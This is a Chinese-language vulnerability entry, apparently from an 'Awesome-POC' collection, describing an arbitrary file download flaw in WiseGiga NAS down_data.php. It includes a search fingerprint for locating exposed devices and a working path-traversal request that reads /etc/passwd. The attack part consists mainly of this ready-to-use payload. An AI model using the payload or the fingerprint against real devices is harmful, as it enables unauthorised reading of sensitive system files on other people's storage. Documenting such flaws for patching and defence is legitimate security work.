Awesome-POC/Web应用漏洞/WiseGiga NAS down_data.php 任意文件下载漏洞.md
2024-11-06 14:10:36 +08:00

33 lines
629 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# WiseGiga NAS down_data.php 任意文件下载漏洞
## 漏洞描述
WiseGiga 是一家销售网络连接存储NAS )产品的韩国公司。
WISEGIGA NAS down_data.php 存在任意文件下载漏洞,由于 /down_data.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件。
## 漏洞影响
```
WiseGiga NAS
```
## 网络测绘
```
app="WISEGIGA-NAS"
```
## 漏洞复现
主页面
![image-20220628113649787](images/202206281136917.png)
验证POC
```
/down_data.php?filename=../../../../../../../../../../../../../../etc/passwd
```
![image-20220628113749412](images/202206281137504.png)